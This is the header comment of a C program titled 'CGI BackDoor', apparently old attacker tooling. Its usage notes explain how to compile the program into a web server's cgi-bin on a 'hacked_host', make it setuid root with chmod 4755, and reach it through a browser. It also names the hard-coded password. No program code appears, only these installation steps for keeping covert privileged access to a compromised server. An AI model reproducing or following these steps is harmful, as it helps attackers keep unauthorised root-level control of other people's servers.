/**********************************************************************/
/* CGI BackDoor by OVERFLOW <overflow@ptlink.net>                     */
/* Thanks to:                                                         */
/*        Heat for his hints and ideas                                */
/*        Marado for his NUKEM CGI                                    */
/*        All Ptlink pple                                             */
/* Usage:                                                             */
/*  ./config.sh                                                       */
/*                                                                    */
/*         =with logs                                                 */
/*  gcc cgiback.c -o /home/httpd/cgi-bin/cgiback.cgi -DO_LOGS -lcrypt */
/*         =without logs                                              */
/*  gcc cgiback.c -o /home/httpd/cgi-bin/cgiback.cgi -lcrypt          */
/*                                                                    */
/*  chmod 4755 /home/httpd/cgi-bin/cgiback.cgi                        */
/*                                                                    */
/*  lynx http://hacked_host.id/cgi-bin/cgiback.cgi                    */
/*                                                                    */
/* Tested in:                                                         */
/*  RedHat 6.1                                                        */
/*                                                                    */
/* Password is encryped with DES                                      */
/*  Real password ->   lamepass                                       */
/*                                                                    */
/**********************************************************************/
